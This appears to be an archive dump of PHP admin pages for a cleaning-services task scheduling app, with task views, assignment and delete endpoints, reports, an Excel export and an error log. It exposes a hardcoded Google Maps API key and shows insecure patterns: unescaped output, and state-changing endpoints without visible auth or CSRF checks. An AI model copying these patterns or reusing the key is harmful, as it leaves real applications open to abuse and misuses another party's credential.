$service->suburb ?: 'Suburb not provided'; ?></h5></td> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->city?: 'City not provided'; ?></h5></td> <tr> <td><i class="ik ik-globe icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->state ?: 'State not provided'; ?></h5></td> <td><i class="ik ik-mail icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->postal_code ?: 'Postal code not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-flag icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->country?: 'Country not provided'; ?></h5></td> </tr> <tr> <td><i class="ik ik-phone icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->phone?: 'Phone not provided'; ?></h5></td> </tr> </tbody> </table> <h4>On Site Location</h4> <table> <tbody> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->on_site_location ?: 'Not provided'; ?></h5></td> </tr> </tbody> </table> <h4>Longitude and Latitude</h4> <table> <tbody> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->latitude ?: 'Not provided'; ?></h5></td> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $service->longitude ?: 'Not provided'; ?></h5></td> </tr> </tbody> </table> <h4>Timestamps</h4> <table> <tbody> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y, g:i a', strtotime($service->created_at)); ?></h5></td> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo date('F j, Y, g:i a', strtotime($service->updated_at)); ?></h5></td> </tr> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } </style> </div> <div class="col-md-6"> <div id="map" style="height: 400px;"></div> </div> </div> </div> </div> <?php if ($latitude !== null && $longitude !== null): ?> <script> function initMap() { var latitude = <?php echo $latitude; ?>; var longitude = <?php echo $longitude; ?>; var map = new google.maps.Map(document.getElementById('map'), { center: {lat: parseFloat(latitude), lng: parseFloat(longitude)}, zoom: 12 }); var marker = new google.maps.Marker({ position: {lat: parseFloat(latitude), lng: parseFloat(longitude)}, map: map, title: 'Service Location' }); } </script> <script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD9O5PAsTaFPCHlIlM4XSK7ei-gaLMYpzk&callback=initMap"> </script> <?php endif; ?> </div> </div> <?php include('footer.php'); ?> emeraadmin/assigntask.php000064400000001305151676701240011536 0ustar00<?php require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { if (isset($_POST['taskId']) && isset($_POST['companyId'])) { $taskId = $_POST['taskId']; $companyId = $_POST['companyId']; // Create TaskService instance $taskService = new TaskService(); // Assign the task to the selected company $result = $taskService->assignTaskToCompany($taskId, $companyId); if ($result) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } emeraadmin/exportScheduleData.php000064400000010401151676701240013154 0ustar00<?php include('head.php'); require_once '../../Service/ScheduleService.php'; $scheduleService = new ScheduleService(); // Fetch all schedules for the dropdown $schedules = $scheduleService->getAllSchedules(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Select Schedule to Export Summary</h5> <span>Select a schedule to export its summary up to today.</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="#"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Export Summary</li> </ol> </nav> </div> </div> </div> <!-- Selection Form --> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="schedule_id">Select Schedule:</label> <select name="schedule_id" id="schedule_id" class="form-control"> <option value="">-- Select Schedule --</option> <?php foreach ($schedules as $schedule) { ?> <option value="<?php echo $schedule->id; ?>"><?php echo htmlspecialchars($schedule->schedule_name); ?></option> <?php } ?> </select> </div> </div> </div> <!-- Export Box --> <div class="row" id="export_box" style="display: none;"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <h5 class="card-title">Export Summary</h5> <p class="card-text">Click the button below to export the selected schedule summary.</p> <button id="export_summary" class="btn btn-success">Export Summary</button> </div> </div> <div id="export_message" class="mt-2 text-danger" style="display: none;">Please select a schedule to export.</div> </div> </div> </div> </div> <script> document.addEventListener("DOMContentLoaded", function() { const scheduleSelect = document.getElementById('schedule_id'); const exportBox = document.getElementById('export_box'); const exportButton = document.getElementById('export_summary'); const exportMessage = document.getElementById('export_message'); scheduleSelect.addEventListener('change', function() { if (scheduleSelect.value) { exportBox.style.display = 'block'; exportMessage.style.display = 'none'; } else { exportBox.style.display = 'none'; exportMessage.style.display = 'block'; } }); exportButton.addEventListener('click', function() { if (!scheduleSelect.value) { exportMessage.style.display = 'block'; } else { const scheduleId = scheduleSelect.value; window.location.href = `export_schedule.php?schedule_id=${scheduleId}`; } }); // Initialize the state based on the current selection if (scheduleSelect.value) { exportBox.style.display = 'block'; } else { exportBox.style.display = 'none'; } }); </script> <?php include('footer.php'); ?> emeraadmin/footer.php000064400000000413151676701240010664 0ustar00<footer class="footer"> <div class="w-100 clearfix"> <span class="text-center text-sm-left d-md-inline-block">Copyright © 2024 genesis it labs. All Rights Reserved.</span> </div> </footer> </div> </div> <?php include('scripts.php'); ?>emeraadmin/report_subtaks_datewise.php000064400000041761151676701240014335 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $TaskProviderId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $subcontractorId = $_GET['subcontractor_id'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $subtasks = $taskService->getAllSubtasksGroupByDate($startDate, $endDate, $subcontractorId, $serviceLocationId); //print_r($subtasks); //get completed subtask count form $subtasks $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?> <!-- Include Bootstrap Datepicker CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/css/bootstrap-datepicker.min.css"/> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks</h5> <span>Assign Tasks to Cleaner</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href=""><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">All Subtasks</li> </ol> </nav> </div> </div> </div> <!-- banner section--> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-footer"> <div class="d-flex"> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-success"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Completed Subtasks</h6> <h2><?= $CompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-shopping-cart"></i> </div> </div> </div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-12"> <div class="widget bg-warning"> <div class="widget-body"> <div class="d-flex justify-content-between align-items-center"> <div class="state"> <h6>Incomplete Subtasks</h6> <h2><?= $IncompletedSubtaskcount; ?></h2> </div> <div class="icon"> <i class="ik ik-inbox"></i> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Date Filter and Today Checkbox --> <div class="row mb-4"> <div class="col-md-3"> <div class="form-group"> <label for="startDate">Start Date</label> <input type="text" id="startDate" class="form-control datepicker" placeholder="Select start date" value="<?= htmlspecialchars($startDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="endDate">End Date</label> <input type="text" id="endDate" class="form-control datepicker" placeholder="Select end date" value="<?= htmlspecialchars($endDate) ?>"> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="subcontractorId">Select a Subcontractor:</label> <select id="subcontractorId" name="subcontractorId" class="form-control select2"> <!-- Default option --> <option value="">All Subcontractors</option> <?php // Fetch company list from the database $companies = $taskService->getAllCompanies(); if ($companies) { foreach ($companies as $company) { // Check if subcontractor_id is set in the URL $selected = ''; if (isset($_GET['subcontractor_id']) && $_GET['subcontractor_id'] == $company->id) { $selected = 'selected'; } echo '<option value="' . $company->id . '" ' . $selected . '>' . $company->first_name . ' ' . $company->last_name . '</option>'; } } else { echo '<option value="">No subcontractors available</option>'; } ?> </select> </div> </div> <div class="col-md-3"> <div class="form-group"> <label for="serviceLocationId">Select a Service Location:</label> <select id="serviceLocationId" name="serviceLocationId" class="form-control select2"> <option value="">All Locations</option> <?php // Collect unique regions foreach ($services as $service) { // Check if serviceLocationId is set in the URL $selected = ''; if (isset($_GET['service_location_id']) && $_GET['service_location_id'] == $service->id) { $selected = 'selected'; } echo '<option value="' . htmlspecialchars($service->id) . '" ' . $selected . '>' . htmlspecialchars($service->name) . '</option>'; } ?> </select> </div> </div> <div class="col-md-3 d-flex align-items-center"> <div class="form-check form-check-inline"> <input class="form-check-input" type="checkbox" id="todayCheckbox" value="today" <?= ($startDate == date('Y-m-d') && $endDate == date('Y-m-d')) ? 'checked' : '' ?>> <label class="form-check-label" for="todayCheckbox">Today</label> </div> </div> <div class="col-md-3 d-flex align-items-center"> <button id="applyFilter" class="btn btn-primary">Apply Filter</button> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <?php foreach ($subtasks as $date => $subtaskList) { ?> <div class="row subtask-row" data-date="<?php echo $date; ?>"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Subtasks for <?php if ($date == date('Y-m-d')) { echo 'Today'; } else if ($date == date('Y-m-d', strtotime('tomorrow'))) { echo 'Tomorrow'; } else { echo date('l, F j, Y', strtotime($date)); } ?></h3> <!-- theme option--> <div class="card-header-right"> <ul class="list-unstyled card-option"> <li><i class="ik ik-chevron-left action-toggle" data-toggle="tooltip" title="Collapse"></i></li> <li><i class="ik ik-minus minimize-card" data-toggle="tooltip" title="Minimize"></i> </li> </ul> </div> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="advanced_table_<?php echo strtotime($date); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Subcontractor</th> <th>Date</th> <th>Time</th> <th>Assigned</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtaskList as $subtask) { ?> <tr> <td>ST-000<?= $subtask['id']; ?></td> <td><?= $subtask['service_name']; ?></td> <td><?= $subtask['assigned_user_first_name'] . ' ' . $subtask['assigned_user_last_name']; ?></td> <td><?= $subtask['subtask_date']; ?></td> <td><?= $subtask['subtask_time'] ? date('h:i A', strtotime($subtask['subtask_time'])) : ''; ?></td> <td><?= $subtask['assigned'] ? '<span class="badge badge-success">Assigned</span>' : '<span class="badge badge-danger">Not Assigned</span>'; ?></td> <td> <?php if ($subtask['ignored']) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask['completed'] ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?= $System->encryptData($subtask['id']); ?>" class="btn btn-primary">View</a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <script> $(document).ready(function () { // Initialize datepickers $('.datepicker').datepicker({ format: 'yyyy-mm-dd', autoclose: true, todayHighlight: true }); // Function to save filters to localStorage function saveFilters() { var filters = { startDate: $('#startDate').val(), endDate: $('#endDate').val(), subcontractorId: $('#subcontractorId').val(), serviceLocationId: $('#serviceLocationId').val(), todayCheckbox: $('#todayCheckbox').is(':checked') }; localStorage.setItem('dateRangeFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('dateRangeFilters')); if (filters) { $('#startDate').val(filters.startDate); $('#endDate').val(filters.endDate); $('#subcontractorId').val(filters.subcontractorId); $('#serviceLocationId').val(filters.serviceLocationId); $('#todayCheckbox').prop('checked', filters.todayCheckbox); } } // Function to reset filters function resetFilters() { $('#startDate').val(''); $('#endDate').val(''); $('#subcontractorId').val(''); $('#serviceLocationId').val(''); $('#todayCheckbox').prop('checked', false); localStorage.removeItem('dateRangeFilters'); applyDateRangeFilter(); } // Apply date range filter by modifying the URL function applyDateRangeFilter() { var startDate = $('#startDate').val(); var endDate = $('#endDate').val(); var subcontractorId = $('#subcontractorId').val(); var serviceLocationId = $('#serviceLocationId').val(); var url = window.location.href.split('?')[0] + '?start_date=' + startDate + '&end_date=' + endDate + '&subcontractor_id=' + subcontractorId + '&service_location_id=' + serviceLocationId; window.location.href = url; } // Event handler for applyFilter button $('#applyFilter').on('click', function () { saveFilters(); applyDateRangeFilter(); }); // Event handler for todayCheckbox $('#todayCheckbox').on('change', function () { if ($(this).is(':checked')) { var today = '<?= date('Y-m-d') ?>'; $('#startDate').val(today); $('#endDate').val(today); } else { $('#startDate').val(''); $('#endDate').val(''); } saveFilters(); applyDateRangeFilter(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Apply saved filters on initial load applyFilters(); }); </script> <?php include('footer.php'); ?> emeraadmin/viewtasks.php000064400000025144151676701240011416 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['service_name'])) { $filters['service_name'] = filter_input(INPUT_GET, 'service_name', FILTER_SANITIZE_STRING); } if (!empty($_GET['region'])) { $filters['region'] = filter_input(INPUT_GET, 'region', FILTER_SANITIZE_STRING); } if (!empty($_GET['frequency'])) { $filters['frequency'] = filter_input(INPUT_GET, 'frequency', FILTER_SANITIZE_STRING); } if (isset($_GET['public']) && $_GET['public'] !== '') { $filters['public'] = filter_input(INPUT_GET, 'public', FILTER_SANITIZE_NUMBER_INT); } if (isset($_GET['finished']) && $_GET['finished'] !== '') { $filters['finished'] = filter_input(INPUT_GET, 'finished', FILTER_SANITIZE_NUMBER_INT); } if (isset($_GET['assigned']) && $_GET['assigned'] !== '') { $filters['assigned'] = filter_input(INPUT_GET, 'assigned', FILTER_SANITIZE_NUMBER_INT); } } // Fetch tasks from the database based on filters $tasks = $taskService->getAllTasks($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Tasks</h5> <span>View all tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Search Tasks</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="service_name">Service Name</label> <input type="text" class="form-control" id="service_name" name="service_name" placeholder="Enter service name" value="<?php echo htmlspecialchars($_GET['service_name'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="region">Region</label> <input type="text" class="form-control" id="region" name="region" placeholder="Enter region" value="<?php echo htmlspecialchars($_GET['region'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="frequency">Frequency</label> <select class="form-control" id="frequency" name="frequency"> <option value="">Select</option> <option value="daily" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === 'daily') ? 'selected' : ''; ?>>Daily</option> <option value="3x/week" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === '3x/week') ? 'selected' : ''; ?>>3x/week</option> </select> </div> <div class="form-group col-md-2"> <label for="public">Public</label> <select class="form-control" id="public" name="public"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['public']) && $_GET['public'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['public']) && $_GET['public'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> <div class="form-group col-md-2"> <label for="finished">Finished</label> <select class="form-control" id="finished" name="finished"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['finished']) && $_GET['finished'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['finished']) && $_GET['finished'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> <div class="form-group col-md-2"> <label for="assigned">Assigned</label> <select class="form-control" id="assigned" name="assigned"> <option value="">Select</option> <option value="1" <?php echo (isset($_GET['assigned']) && $_GET['assigned'] === '1') ? 'selected' : ''; ?>>Yes</option> <option value="0" <?php echo (isset($_GET['assigned']) && $_GET['assigned'] === '0') ? 'selected' : ''; ?>>No</option> </select> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="viewtasks.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Search Form --> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>#</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Finished</th> <th>Assigned</th> <th>Assigned To</th> <th>Accepted</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($tasks)): ?> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo htmlspecialchars($task->added_by_name); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo ($task->finished ? '<label class="badge badge-success">Finished</label>' : '<label class="badge badge-danger">Not Finished</label>'); ?></td> <td><?php echo ($task->is_assigned ? '<label class="badge badge-success">Assigned</label>' : '<label class="badge badge-danger">Not Assigned</label>'); ?></td> <td><?php echo htmlspecialchars($task->assigned_to_name); ?></td> <th><?php echo ($task->accepted ? ' <label class="badge badge-success">Accepted</label>' : '<label class="badge badge-yellow">Not Accepted</label>'); ?></th> <td><label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label></td> <td><a href="viewtask.php?id=<?php echo htmlspecialchars($System->encryptData($task->id)); ?>" class="btn btn-primary">View Details</a></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="10">No tasks found.</td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/makepublic.php000064400000000770151676701240011510 0ustar00<?php require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { if (isset($_POST['taskId'])) // Create TaskService instance $taskService = new TaskService(); // Assign the task to the selected company $result = $taskService->makeTaskPublic($_POST['taskId']); if ($result) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; }emeraadmin/delete_task.php000064400000001574151676701240011663 0ustar00<?php require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); $taskService = new TaskService(); if (isset($_POST['taskId']) && !empty($_POST['taskId'])) { $taskId= $_POST['taskId']; $decryptedtaskId = $System->decryptData($taskId); error_log("Task ID received: " . $taskId); // Check the received task ID error_log("Decrypted Task ID: " . $decryptedtaskId); // Check the decrypted task ID if (!$taskId) { echo "Invalid Task ID"; exit; } // Call deleteTaskWithSubtasks method from TaskService $deleteResult = $taskService->deleteTaskWithSubtasks($decryptedtaskId); if ($deleteResult === true) { echo "success"; } else { echo "error"; } } else { echo "Task ID is missing"; } ?> emeraadmin/ignore_subtasks.php000064400000001731151676701240012574 0ustar00<?php require_once __DIR__ . '/../../Service/SubtaskService.php'; header('Content-Type: application/json'); $subtaskService = new SubtaskService(); $response = []; if (isset($_POST['subtaskIds']) && !empty($_POST['subtaskIds'])) { $subtaskIds = json_decode($_POST['subtaskIds'], true); if (!is_array($subtaskIds)) { $response['status'] = 'error'; $response['message'] = 'Invalid Subtask IDs'; echo json_encode($response); exit; } $ignoreResult = $subtaskService->ignoreSubtasks($subtaskIds); if ($ignoreResult) { $response['status'] = 'success'; $response['message'] = 'All subtasks ignored successfully'; } else { $response['status'] = 'error'; $response['message'] = 'One or more subtasks could not be ignored'; } } else { $response['status'] = 'error'; $response['message'] = 'Subtask IDs are missing'; } echo json_encode($response); ?> emeraadmin/report_TaskSummaryForUsers.php000064400000012353151676701240014740 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; // Create TaskService instance $taskService = new TaskService(); // Fetch task summaries for each user $taskSummaries = $taskService->getTaskSummaryForUsers(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Task Summary for Each User</h5> <span>Summary of tasks for each user</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Task Summary for Each User</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>Task Assign Summary for Each User</h3></div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="task_summary_table"> <thead> <tr> <th>User ID</th> <th>User Name</th> <th>Assigned Tasks</th> <th>Accepted Tasks</th> <th>Pending Tasks</th> </tr> </thead> <tbody> <?php foreach ($taskSummaries as $summary) { ?> <tr> <td><?= 'U-000'.htmlspecialchars($summary->user_id); ?></td> <td><?= htmlspecialchars($summary->user_name); ?></td> <td><?= htmlspecialchars($summary->assigned_tasks); ?></td> <td><?= htmlspecialchars($summary->accepted_tasks); ?></td> <td><?= htmlspecialchars($summary->pending_tasks); ?></td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>Task Completion Summary for Each User</h3></div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="task_summary_table"> <thead> <tr> <th>User ID</th> <th>User Name</th> <th>Accepted Tasks</th> <th>Completed Tasks</th> <th>Incomplete Tasks</th> </tr> </thead> <tbody> <?php foreach ($taskSummaries as $summary) { ?> <tr> <td><?= 'U-000'.htmlspecialchars($summary->user_id); ?></td> <td><?= htmlspecialchars($summary->user_name); ?></td> <td><?= htmlspecialchars($summary->accepted_tasks); ?></td> <td><?= htmlspecialchars($summary->completed_tasks); ?></td> <td><?= htmlspecialchars($summary->not_completed_tasks); ?></td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { $('#task_summary_table').DataTable(); }); </script> taskprovider/export_schedule.php000064400000011045151676701240013201 0ustar00<?php //enable error reporting ini_set('display_errors', 1); ini_set('display_startup_errors', 1); // Include Composer's autoload file to load PHPSpreadsheet require '../../vendor/autoload.php'; require_once __DIR__ . '/../../Classes/Database.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Style\Color; use PhpOffice\PhpSpreadsheet\Writer\Xlsx; // Function to export schedule tasks to Excel and return file contents function exportScheduleToExcel($scheduleId) { // Establish database connection (replace with your connection logic) $db = new Database(); $pdo = $db->getConn(); // SQL query to fetch tasks with subtask dates and times formatted $sql = " SELECT srv.name AS service_name, srv.region, t.frequency, GROUP_CONCAT(DISTINCT st.subtask_date ORDER BY st.subtask_date SEPARATOR ', ') AS subtask_dates FROM tasks t JOIN subtasks st ON t.id = st.task_id JOIN services srv ON t.service_id = srv.id WHERE t.schedule_id = :schedule_id GROUP BY srv.name, srv.region, t.frequency, t.id ORDER BY srv.name, srv.region, t.frequency "; $stmt = $pdo->prepare($sql); $stmt->bindValue(':schedule_id', $scheduleId, PDO::PARAM_INT); $stmt->execute(); $tasks = $stmt->fetchAll(PDO::FETCH_ASSOC); // Create a new Spreadsheet object $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // Set headers or titles in the Excel sheet $sheet->setCellValue('A1', 'Service Name'); $sheet->setCellValue('B1', 'Region'); $sheet->setCellValue('C1', 'Frequency'); // Get all distinct subtask dates $distinctDates = []; foreach ($tasks as $task) { $dates = explode(', ', $task['subtask_dates']); $distinctDates = array_merge($distinctDates, $dates); } $distinctDates = array_unique($distinctDates); sort($distinctDates); // Set dates as headers in the Excel sheet $col = 'D'; foreach ($distinctDates as $date) { $sheet->setCellValue($col . '1', $date); $sheet->getColumnDimension($col)->setWidth(12); // Adjust width as needed $col++; } // Populate tasks data into Excel $row = 2; foreach ($tasks as $task) { $sheet->setCellValue('A' . $row, $task['service_name']); $sheet->setCellValue('B' . $row, $task['region']); $sheet->setCellValue('C' . $row, $task['frequency']); // Split subtask dates for the current task $dates = explode(', ', $task['subtask_dates']); $col = 'D'; foreach ($distinctDates as $date) { // Check if the date exists for the current task or color black $value = in_array($date, $dates) ? 'X' : ''; // Set value in corresponding cell $cellCoordinate = $col . $row; $sheet->setCellValue($cellCoordinate, $value); // Apply black color to non-X values if ($value !== 'X') { $spreadsheet->getActiveSheet()->getStyle($cellCoordinate) ->getFont()->getColor()->setARGB(Color::COLOR_BLACK); } $col++; } $row++; } // Set column widths (optional) $sheet->getColumnDimension('A')->setWidth(25); // Adjust width as needed $sheet->getColumnDimension('B')->setWidth(20); $sheet->getColumnDimension('C')->setWidth(15); // Set headers for Excel file download header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'); header('Content-Disposition: attachment;filename="schedule_export_' . date('Y-m-d') . '.xlsx"'); header('Cache-Control: max-age=0'); // Save Excel file to PHP output (browser will download it) $writer = new Xlsx($spreadsheet); $writer->save('php://output'); } // Check if schedule_id is provided via GET request if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['schedule_id'])) { $scheduleId = $_GET['schedule_id']; try { // Export schedule to Excel and initiate download exportScheduleToExcel($scheduleId); exit; // Stop further execution after file download } catch (Exception $e) { // Handle exceptions (e.g., database errors, file saving errors) echo 'Error: ' . $e->getMessage(); } } else { // Handle case where schedule_id parameter is missing echo 'Error: Schedule ID parameter missing.'; } ?> taskprovider/error_log000064400000054711151676701240011217 0ustar00[15-Sep-2024 08:02:20 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [15-Sep-2024 08:03:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:27:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:29:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:37:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:40:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:41:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:41:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 